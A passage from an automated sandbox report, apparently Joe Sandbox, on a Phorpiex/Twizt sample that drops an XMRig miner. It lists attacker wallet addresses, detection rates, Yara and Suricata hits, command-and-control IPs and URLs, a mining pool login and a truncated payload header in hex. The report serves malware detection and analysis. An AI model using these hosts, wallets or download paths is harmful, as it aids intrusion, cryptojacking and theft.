"stars125f3mw4xd9htpsq4zj5w5ezm5gags37yxxh6mj", "stride125f3mw4xd9htpsq4zj5w5ezm5gags37y33qmy0", "sei125f3mw4xd9htpsq4zj5w5ezm5gags37ylk33kz", "sys1q0zg3clqajs04p2yhkgf96nf4hmup9mdr8l38u6", "bnb1msyt0djx4ecspfxg5en0ye465kg3kmv9utzml2", "bc1ppypcmu3684n648gyj62gjp2rw0xy7w3vwfamatlg29ajp4z52desafa0sr", "bc1qc9edl4hzl9jyt8twdad3zjeh2df2znq96tdezd", "btg1qwg85kf0r3885a82wtld053fy490lm2q2gemgpy", "ronin:a77fa3ea6e09a5f3fbfcb2a42fe21b5cf0ecdd17", "bitcoincash:qph44jx8r9k5xeq5cuf958krv3ewrnp5vc6hhdjd3r", "cosmos125f3mw4xd9htpsq4zj5w5ezm5gags37yj6q8sr", "addr1qxlwyj95fk9exqf55tdknx49e5443nr925tajatrdqpp8djla7u9jhswc3dk39se79f9zhwwq2ca95er3mylm48wyalqr62dmg", "nano_3p8stz4wqicgda1g3ifd48girzd5u74is8sdqq99tkuuz1b96wjwbc7yrmnb", "GBQJMXYXPRIWFMXIFJR35ZB7LRKMB4PHCIUAUFR3TKUL6RDBZVLZEUJ3", "Gcrx8cK7ffKLaPJwiYHQrgi6pFTLbJsBPV", "EQxXrZv7VQpoAA15kJ1XJyXVxT3yQSoNyM", "B62qpDfv86fUZc4ntrYJL6eFJZajjNKRcBuW5iPbcLNkiPekLkV8NdA", "BKyTYg4eZC9NCzcL8M3hcUmDhCnBJrSScH", "UQAbBKbfkiK3Gjo86zgD3yYO5Njf7zxPTEO4JLqN13ruoGDb"]}

Multi AV Scanner detection for domain / URL

Source: twizt.net	Virustotal: Detection: 19%	Perma Link
Source: http://185.215.113.66/reg.php?s=%s	Virustotal: Detection: 15%	Perma Link
Source: http://91.202.233.141/ALLBSTATAASASD	Virustotal: Detection: 17%	Perma Link
Source: http://185.215.113.66/5S	Virustotal: Detection: 16%	Perma Link
Source: http://91.202.233.141/TLOADEDBROMozilla/5.0	Virustotal: Detection: 10%	Perma Link
Source: http://91.202.233.141/dwntbl	Virustotal: Detection: 14%	Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\pei[1].exe	ReversingLabs: Detection: 65%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\nxmr[1].exe	ReversingLabs: Detection: 76%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\newtpp[1].exe	ReversingLabs: Detection: 81%
Source: C:\Users\user\AppData\Local\Temp\1332331323.exe	ReversingLabs: Detection: 76%
Source: C:\Users\user\AppData\Local\Temp\1378231302.exe	ReversingLabs: Detection: 55%
Source: C:\Users\user\AppData\Local\Temp\158238779.exe	ReversingLabs: Detection: 75%
Source: C:\Users\user\AppData\Local\Temp\1706633239.exe	ReversingLabs: Detection: 81%
Source: C:\Users\user\AppData\Local\Temp\193938922.exe	ReversingLabs: Detection: 75%
Source: C:\Users\user\AppData\Local\Temp\2311326414.exe	ReversingLabs: Detection: 55%
Source: C:\Users\user\AppData\Local\Temp\236013504.exe	ReversingLabs: Detection: 57%
Source: C:\Users\user\AppData\Local\Temp\2448028260.exe	ReversingLabs: Detection: 76%
Source: C:\Users\user\AppData\Local\Temp\281653412.exe	ReversingLabs: Detection: 57%
Source: C:\Users\user\AppData\Local\Temp\446629599.exe	ReversingLabs: Detection: 81%
Source: C:\Users\user\AppData\Local\Temp\65841553.exe	ReversingLabs: Detection: 76%
Source: C:\Users\user\AppData\Local\Temp\70AF.exe	ReversingLabs: Detection: 65%
Source: C:\Users\user\AppData\Local\Temp\jacrzswcvuml.tmp	ReversingLabs: Detection: 70%
Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe	ReversingLabs: Detection: 76%
Source: C:\Users\user\sysppvrdnvs.exe	ReversingLabs: Detection: 81%
Source: C:\Windows\sysppvrdnvs.exe	ReversingLabs: Detection: 81%

Multi AV Scanner detection for submitted file

Source: T52Z708x2p.exe	Virustotal: Detection: 59%			Perma Link
Source: T52Z708x2p.exe	ReversingLabs: Detection: 60%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\nxmr[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1706633239.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\158238779.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\pei[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\193938922.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\65841553.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\70AF.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1332331323.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\newtpp[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\446629599.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\2448028260.exe	Joe Sandbox ML: detected

Source: C:\Users\user\AppData\Local\Temp\1706633239.exe	Code function: 5_2_0040C830 CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,	5_2_0040C830
Source: C:\Windows\sysppvrdnvs.exe	Code function: 6_2_0040C830 CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,	6_2_0040C830
Source: C:\Windows\sysppvrdnvs.exe	Code function: 19_2_0040C830 CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,	19_2_0040C830

Phishing

Yara detected Phorpiex

Source: Yara match	File source: 35.2.sysppvrdnvs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 48.2.sysppvrdnvs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.0.sysppvrdnvs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.0.sysppvrdnvs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.1706633239.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.446629599.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.sysppvrdnvs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 52.0.sysppvrdnvs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.1706633239.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.sysppvrdnvs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 52.2.sysppvrdnvs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.sysppvrdnvs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 48.0.sysppvrdnvs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.0.446629599.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.1484456893.000000000053E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000000.1949731068.0000000000410000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.2627233365.0000000000410000.00000002.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 00000030.00000002.2090805387.0000000000410000.00000002.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1960141722.0000000000410000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1966173412.0000000005B70000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000030.00000000.2069869412.0000000000410000.00000002.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.1450900740.0000000000410000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.1610696974.0000000000410000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000000.1976145001.0000000000410000.00000002.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.1473803939.0000000000410000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000000.1588390233.0000000000410000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.1986636602.0000000000410000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1484354492.0000000000410000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000034.00000000.2150937536.0000000000410000.00000002.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 00000034.00000002.2171612447.0000000000410000.00000002.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.1986738654.000000000057E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 1706633239.exe PID: 7568, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: sysppvrdnvs.exe PID: 7612, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: sysppvrdnvs.exe PID: 4236, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 446629599.exe PID: 4260, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: sysppvrdnvs.exe PID: 7404, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: sysppvrdnvs.exe PID: 7840, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: sysppvrdnvs.exe PID: 5948, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\sysppvrdnvs.exe, type: DROPPED
Source: Yara match	File source: C:\Windows\sysppvrdnvs.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\newtpp[1].exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\446629599.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1706633239.exe, type: DROPPED

Bitcoin Miner

Yara detected Xmrig cryptocurrency miner

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 51.2.winupsecvmgr.exe.7ff75d000320.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 51.2.winupsecvmgr.exe.7ff75d000320.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 51.2.winupsecvmgr.exe.7ff75cffca40.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 51.2.winupsecvmgr.exe.7ff75cfc0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000042.00000002.2630066615.0000018B41702000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000033.00000002.2319595860.00007FF75CFDB000.00000004.00000001.01000000.00000014.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: winupsecvmgr.exe PID: 6256, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\jacrzswcvuml.tmp, type: DROPPED

Detected Stratum mining protocol

Source: global traffic

TCP traffic: 192.168.2.7:49999 -> 185.215.113.66:5152 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"47feq5mtn8mcl91sadm6ooigyfkddgftchftudhdqloyz4kps7jg19n1ua8eswuzometjqqkkkzr6nmcbuwa3htua2dee6e","pass":"x","agent":"xmrig/6.19.0 (windows nt 10.0; win64; x64) libuv/1.38.0 msvc/2019","rigid":"","algo":["rx/0","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","cn/gpu","cn/1","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","argon2/chukwa","argon2/chukwav2","argon2/ninja","ghostrider"]}}.

Found strings related to Crypto-Mining

Source: winupsecvmgr.exe, 00000033.00000002.2319595860.00007FF75CFDB000.00000004.00000001.01000000.00000014.sdmp	String found in binary or memory: losestratum+tcp://
Source: winupsecvmgr.exe, 00000033.00000002.2319595860.00007FF75CFDB000.00000004.00000001.01000000.00000014.sdmp	String found in binary or memory: cryptonight/0
Source: winupsecvmgr.exe, 00000033.00000002.2319595860.00007FF75CFDB000.00000004.00000001.01000000.00000014.sdmp	String found in binary or memory: losestratum+tcp://
Source: winupsecvmgr.exe, 00000033.00000002.2319595860.00007FF75CFDB000.00000004.00000001.01000000.00000014.sdmp	String found in binary or memory: -o, --url=URL URL of mining server
Source: winupsecvmgr.exe, 00000033.00000002.2319595860.00007FF75CFDB000.00000004.00000001.01000000.00000014.sdmp	String found in binary or memory: Usage: xmrig [OPTIONS]
Source: winupsecvmgr.exe, 00000033.00000002.2319595860.00007FF75CFDB000.00000004.00000001.01000000.00000014.sdmp	String found in binary or memory: Usage: xmrig [OPTIONS]

Source: C:\Users\user\AppData\Local\Temp\70AF.exe

File opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.9625_none_508ef7e4bcbbe589\MSVCR90.dll

Jump to behavior

Source:	Binary string: F:\src\cef\chromium_git\3538\chromium\src\out\Release_GN_x64\courgette64.exe.pdb source: T52Z708x2p.exe, 00000001.00000002.1398512211.0000000140076000.00000002.00000001.01000000.00000003.sdmp, T52Z708x2p.exe, 00000001.00000000.1378716039.0000000140076000.00000002.00000001.01000000.00000003.sdmp
Source:	Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: winupsecvmgr.exe, 00000033.00000002.2319595860.00007FF75CFDB000.00000004.00000001.01000000.00000014.sdmp

Source: C:\Users\user\Desktop\T52Z708x2p.exe	Code function: 1_2_0000000140073710 FindFirstFileExW,	1_2_0000000140073710
Source: C:\Users\user\Desktop\T52Z708x2p.exe	Code function: 1_2_0000000140028D50 FindNextFileW,FindClose,FindFirstFileExW,GetFileAttributesW,PathMatchSpecW,	1_2_0000000140028D50
Source: C:\Users\user\AppData\Local\Temp\1706633239.exe	Code function: 5_2_004068E0 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,	5_2_004068E0
Source: C:\Users\user\AppData\Local\Temp\1706633239.exe	Code function: 5_2_004067A0 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW,	5_2_004067A0
Source: C:\Windows\sysppvrdnvs.exe	Code function: 6_2_004068E0 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,	6_2_004068E0
Source: C:\Windows\sysppvrdnvs.exe	Code function: 6_2_004067A0 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW,	6_2_004067A0
Source: C:\Windows\sysppvrdnvs.exe	Code function: 19_2_004068E0 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,	19_2_004068E0
Source: C:\Windows\sysppvrdnvs.exe	Code function: 19_2_004067A0 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW,	19_2_004067A0

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.7:56959 -> 87.237.236.86:40500
Source: Network traffic	Suricata IDS: 2856563 - Severity 1 - ETPRO MALWARE Phorpiex Domain in DNS Lookup : 192.168.2.7:49258 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.7:56959 -> 185.203.237.213:40500
Source: Network traffic	Suricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.7:49810 -> 185.215.113.66:80
Source: Network traffic	Suricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.7:49857 -> 185.215.113.66:80
Source: Network traffic	Suricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.7:49795 -> 185.215.113.66:80
Source: Network traffic	Suricata IDS: 2837677 - Severity 1 - ETPRO MALWARE Phorpiex RC4 Encrypted Payload Inbound via HTTP (512 signature) : 185.215.113.66:80 -> 192.168.2.7:49810
Source: Network traffic	Suricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.7:56959 -> 175.107.23.112:40500
Source: Network traffic	Suricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.7:56959 -> 146.70.53.161:40500
Source: Network traffic	Suricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.7:56959 -> 5.234.49.217:40500
Source: Network traffic	Suricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.7:49906 -> 185.215.113.66:80
Source: Network traffic	Suricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.7:49950 -> 185.215.113.66:80
Source: Network traffic	Suricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.7:56959 -> 2.179.178.50:40500
Source: Network traffic	Suricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.7:56959 -> 195.158.16.52:40500
Source: Network traffic	Suricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.7:49984 -> 185.215.113.66:80
Source: Network traffic	Suricata IDS: 2853292 - Severity 1 - ETPRO MALWARE Win32/Phorpiex Twizt Variant CnC Checkin : 192.168.2.7:49732 -> 185.215.113.66:80
Source: Network traffic	Suricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.7:49989 -> 185.215.113.66:80
Source: Network traffic	Suricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.7:49991 -> 185.215.113.66:80
Source: Network traffic	Suricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.7:65303 -> 217.24.149.46:40500
Source: Network traffic	Suricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.7:65303 -> 88.204.217.130:40500
Source: Network traffic	Suricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.7:65303 -> 90.156.162.79:40500
Source: Network traffic	Suricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.7:65303 -> 175.107.23.112:40500
Source: Network traffic	Suricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.7:49993 -> 185.215.113.66:80
Source: Network traffic	Suricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.7:49994 -> 185.215.113.66:80
Source: Network traffic	Suricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.7:49996 -> 185.215.113.66:80
Source: Network traffic	Suricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.7:65303 -> 185.71.152.222:40500
Source: Network traffic	Suricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.7:65303 -> 124.109.48.132:40500
Source: Network traffic	Suricata IDS: 2837677 - Severity 1 - ETPRO MALWARE Phorpiex RC4 Encrypted Payload Inbound via HTTP (512 signature) : 185.215.113.66:80 -> 192.168.2.7:49991
Source: Network traffic	Suricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.7:65303 -> 109.165.55.243:40500
Source: Network traffic	Suricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.7:50000 -> 185.215.113.66:80
Source: Network traffic	Suricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.7:65303 -> 175.106.46.94:40500
Source: Network traffic	Suricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.7:49998 -> 185.215.113.66:80
Source: Network traffic	Suricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.7:65303 -> 195.190.112.66:40500
Source: Network traffic	Suricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.7:65303 -> 87.237.236.86:40500
Source: Network traffic	Suricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.7:50002 -> 91.202.233.141:80
Source: Network traffic	Suricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.7:50005 -> 185.215.113.66:80
Source: Network traffic	Suricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.7:65303 -> 213.206.50.15:40500
Source: Network traffic	Suricata IDS: 2837677 - Severity 1 - ETPRO MALWARE Phorpiex RC4 Encrypted Payload Inbound via HTTP (512 signature) : 185.215.113.66:80 -> 192.168.2.7:49989
Source: Network traffic	Suricata IDS: 2853272 - Severity 1 - ETPRO MALWARE Win32/Phorpiex Bot Executable Payload Inbound : 185.215.113.66:80 -> 192.168.2.7:49714
Source: Network traffic	Suricata IDS: 2837677 - Severity 1 - ETPRO MALWARE Phorpiex RC4 Encrypted Payload Inbound via HTTP (512 signature) : 185.215.113.66:80 -> 192.168.2.7:49795
Source: Network traffic	Suricata IDS: 2837677 - Severity 1 - ETPRO MALWARE Phorpiex RC4 Encrypted Payload Inbound via HTTP (512 signature) : 185.215.113.66:80 -> 192.168.2.7:50005

Contains functionality to check if Internet connection is working

Source: C:\Users\user\AppData\Local\Temp\1706633239.exe	Code function: 5_2_0040B430 htons,socket,connect,getsockname, www.update.microsoft.com	5_2_0040B430
Source: C:\Windows\sysppvrdnvs.exe	Code function: 6_2_0040B430 htons,socket,connect,getsockname, www.update.microsoft.com	6_2_0040B430
Source: C:\Windows\sysppvrdnvs.exe	Code function: 19_2_0040B430 htons,socket,connect,getsockname, www.update.microsoft.com	19_2_0040B430

Source: unknown

Network traffic detected: IP country count 10

Source: global traffic	TCP traffic: 192.168.2.7:49816 -> 94.230.237.65:40500
Source: global traffic	TCP traffic: 192.168.2.7:49905 -> 178.71.163.141:40500
Source: global traffic	TCP traffic: 192.168.2.7:49983 -> 213.230.124.7:40500
Source: global traffic	TCP traffic: 192.168.2.7:49987 -> 77.240.41.3:40500
Source: global traffic	TCP traffic: 192.168.2.7:49992 -> 78.39.226.153:40500
Source: global traffic	TCP traffic: 192.168.2.7:49995 -> 95.188.243.246:40500
Source: global traffic	TCP traffic: 192.168.2.7:49997 -> 198.163.200.67:40500
Source: global traffic	TCP traffic: 192.168.2.7:49999 -> 185.215.113.66:5152
Source: global traffic	TCP traffic: 192.168.2.7:50001 -> 185.71.152.222:40500
Source: global traffic	TCP traffic: 192.168.2.7:50003 -> 5.235.173.196:40500
Source: global traffic	TCP traffic: 192.168.2.7:50004 -> 198.163.193.12:40500
Source: global traffic	UDP traffic: 192.168.2.7:56959 -> 87.237.236.86:40500
Source: global traffic	UDP traffic: 192.168.2.7:56959 -> 185.203.237.213:40500
Source: global traffic	UDP traffic: 192.168.2.7:56959 -> 175.107.23.112:40500
Source: global traffic	UDP traffic: 192.168.2.7:56959 -> 146.70.53.161:40500
Source: global traffic	UDP traffic: 192.168.2.7:56959 -> 5.234.49.217:40500
Source: global traffic	UDP traffic: 192.168.2.7:56959 -> 95.59.62.94:40500
Source: global traffic	UDP traffic: 192.168.2.7:56959 -> 2.179.178.50:40500
Source: global traffic	UDP traffic: 192.168.2.7:56959 -> 195.158.16.52:40500
Source: global traffic	UDP traffic: 192.168.2.7:65303 -> 217.24.149.46:40500
Source: global traffic	UDP traffic: 192.168.2.7:65303 -> 88.204.217.130:40500
Source: global traffic	UDP traffic: 192.168.2.7:65303 -> 90.156.162.79:40500
Source: global traffic	UDP traffic: 192.168.2.7:65303 -> 213.230.67.151:40500
Source: global traffic	UDP traffic: 192.168.2.7:65303 -> 124.109.48.132:40500
Source: global traffic	UDP traffic: 192.168.2.7:65303 -> 213.206.50.15:40500
Source: global traffic	UDP traffic: 192.168.2.7:65303 -> 109.165.55.243:40500
Source: global traffic	UDP traffic: 192.168.2.7:65303 -> 175.106.46.94:40500
Source: global traffic	UDP traffic: 192.168.2.7:65303 -> 195.190.112.66:40500

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 26 Oct 2024 05:26:26 GMTContent-Type: application/octet-streamContent-Length: 9728Last-Modified: Wed, 15 May 2024 14:33:59 GMTConnection: keep-aliveETag: "6644c7d7-2600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 67 64 0e 23 23 05 60 70 23 05 60 70 23 05 60 70 2a 7d f3 70 21 05 60 70 2a 7d f5 70 22 05 60 70 2a 7d e3 70 36 05 60 70 04 c3 1b 70 28 05 60 70 23 05 61 70 18 05 60 70 2a 7d e4 70 20 05 60 70 2a 7d f1 70 22 05 60 70 52 69 63 68 23 05 60 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 b8 c7 44 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 09 00 00 0e 00 00 00 14 00 00 00 00 00 00 19 17 00 00 00 10 00 00 00 20 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 60 00 00 00 04 00 00 3f d4 00 00 02 00 40 81 00 00 